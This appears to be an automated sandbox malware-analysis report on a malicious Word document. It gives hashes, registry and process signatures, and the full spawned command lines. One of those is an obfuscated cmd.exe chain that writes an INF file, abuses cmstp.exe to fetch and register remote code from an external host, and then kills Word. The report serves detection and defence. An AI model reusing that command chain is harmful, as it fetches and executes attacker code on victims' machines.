Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
16/05/2024, 05:46
Behavioral task
behavioral1
Sample
49a64838968e596db7b80d5cbbe025c4_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
49a64838968e596db7b80d5cbbe025c4_JaffaCakes118.doc
Resource
win10v2004-20240226-en
General
-
Target
49a64838968e596db7b80d5cbbe025c4_JaffaCakes118.doc
-
Size
117KB
-
MD5
49a64838968e596db7b80d5cbbe025c4
-
SHA1
5973a9faa1975f80540d7954d24b5936ab2b95d2
-
SHA256
a0111977c79f4eb30511f22055b54e4e973c0501240f3ba462691b1b4999d561
-
SHA512
3da1e625f6dd80d6a7f4ffe90be21d1d5b33c1ca85d0bd8a73d1831e629e6be407edf15456d10516ea279673aec2b71e0273a0909d9cc9e0798b40e21c7ec478
-
SSDEEP
1536:7mouQ4iFSxMT9BRAKg+6m1CEczGpdOWHMTo6jcpq:SQ4iFUMpBRAhqHGop
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4376 4172 cmd.exe 91 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Kills process with taskkill 1 IoCs
pid Process 3984 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4664 WINWORD.EXE 4664 WINWORD.EXE -
Suspicious behavior: LoadsDriver 10 IoCs
pid Process 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 660 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3984 taskkill.exe Token: SeTakeOwnershipPrivilege 4948 cmstp.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4664 WINWORD.EXE 4664 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4664 WINWORD.EXE 4664 WINWORD.EXE 4664 WINWORD.EXE 4664 WINWORD.EXE 4664 WINWORD.EXE 4664 WINWORD.EXE 4664 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4664 wrote to memory of 1712 4664 WINWORD.EXE 94 PID 4664 wrote to memory of 1712 4664 WINWORD.EXE 94 PID 4376 wrote to memory of 4948 4376 cmd.exe 107 PID 4376 wrote to memory of 4948 4376 cmd.exe 107 PID 4376 wrote to memory of 3984 4376 cmd.exe 108 PID 4376 wrote to memory of 3984 4376 cmd.exe 108
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\49a64838968e596db7b80d5cbbe025c4_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3692 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:81⤵PID:4988
-
C:\Windows\system32\cmd.execmd /V /C set "let81=s" && !let81!et "let78=i" && !let81!et "let71=A" && !let81!et "let23=N" && !let81!et "let43=d" && c!let71!ll !let81!et "let28=%!let71!PP!let43!!let71!T!let71!%" && c!let71!ll !let81!et "let66=%R!let71!!let23!!let43!OM%" && !let81!et "let36=!let28!\M!let78!cro!let81!oft\!let66!.txt" && !let81!et "let67="^" && (For %i in ("[ver!let81!ion]" "!let81!ignature=$Wi!let23!dow!let81! NT$" "!let71!dvancedINF=2.5" "[DefaultIn!let81!tall_SingleU!let81!er]" "UnRegi!let81!terOCXs=let57" "[let57]" "%11%\%let73_1%%let73_2%%let73_3%,NI,%let21_1%%let21_2%%let21_3%%let21_4%%let21_5%%let21_6%%let21_7%%let21_8%%let21_9%%let21_10%%let21_11%%let21_12%%let21_13%" "[!let81!tring!let81!]" "let21_1=ht" "let21_2=tp" "let21_3=:/" "let21_4=/t" "let21_5=ra" "let21_6=ns" "let21_7=ef" "let21_8=.b" "let21_9=iz" "let21_10=/f" "let21_11=r." "let21_12=tx" "let21_13=t" "let73_2=rO" "let73_1=sC" "let73_3=bJ" ) do @echo %~i)>"!let36!" && echo !let81!erv!let78!ceName=!let67! !let67!>>!let36! && echo !let81!hortSvcN!let71!me=!let67! !let67!>>!let36! && c!let71!ll !let81!et "let93=%WI!let23!!let43!IR%" && !let81!t!let71!rt "" !let93!\Sy!let81!tem32\cm!let81!tp.exe /s /ns "!let36!" && !let81!t!let71!rt "" /M!let78!N t!let71!skk!let78!ll /F /!let78!M w!let78!nwor!let43!.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\System32\cmstp.exeC:\Windows\System32\cmstp.exe /s /ns "C:\Users\Admin\AppData\Roaming\Microsoft\9598.txt"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\system32\taskkill.exetAskkill /F /iM winword.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5ae84943915024b9d6e6d14f9fca34eb7
SHA175ce8f36053ec703f93c117c3c717ab770e03464
SHA25686758697760334c5d5c17986d803717b9fbc1fafe4b17d44e7b1698e5882d64a
SHA5123864d056a7fd2970973d777b0735273407a40c96173239a6362ddcdff5e89857cc0749b99f5c1197b6081eb35c7ee56a9fcacc7f5524bffaeb63c53242fa2a99
-
Filesize
514B
MD57f90b0c4f536defbd03f45e8537fd808
SHA125ecbc520887c090f6b7cc145d752e8b366a9f07
SHA2561a671c60e8cf4ef7396ff571edca9355f9340ece00ecaa6084fb08bbf5a81e79
SHA51208a5f00a4282fc9b1b37be76797d184c77f77f2a81fe665f23c564b8f12e4db5d96e7bafbf9aa75916954810b02e79df014eb9c949658e41b8f179a727acf4ed